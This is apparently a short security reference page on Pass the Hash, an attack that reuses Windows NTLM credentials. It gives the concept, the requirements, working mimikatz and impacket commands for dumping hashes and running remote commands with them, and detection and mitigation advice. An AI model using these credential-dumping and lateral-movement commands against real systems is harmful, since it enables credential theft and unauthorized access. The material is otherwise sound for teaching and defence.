Pass the Hash

Lateral Movement

what is it?

Pass the Hash (PtH) is a technique that uses a captured NTLM hash to authenticate as a user without knowing their plaintext password. Because NTLM authentication uses the hash directly as a credential, an attacker with a valid hash can authenticate to any service that accepts NTLM — SMB, WMI, RDP (in some configs), and more.

requirements

  • A captured NTLM hash (from mimikatz, secretsdump, or similar)
  • Network access to the target
  • Target must accept NTLM authentication (most Windows environments do)

attack steps

1. obtain a hash

1# dump from lsass on a compromised host
2mimikatz # sekurlsa::logonpasswords
3
4# remote dump via impacket
5secretsdump.py domain/user:[email protected]

2. authenticate with the hash

1# psexec with hash
2psexec.py -hashes :ntlmhash domain/[email protected]
3
4# wmiexec
5wmiexec.py -hashes :ntlmhash domain/[email protected]
6
7# smbclient
8smbclient.py -hashes :ntlmhash domain/[email protected]

detection

  • Event ID 4624 logon type 3 (network) with NTLM authentication where Kerberos would be expected
  • Mismatched workstation names or unusual source IPs for privileged accounts

mitigation

  • Enable Protected Users security group — prevents NTLM auth for member accounts
  • Disable NTLM where possible via GPO (Network security: Restrict NTLM)
  • Use Credential Guard to protect lsass from memory reads
  • Enforce tiered administration to limit where privileged hashes are cached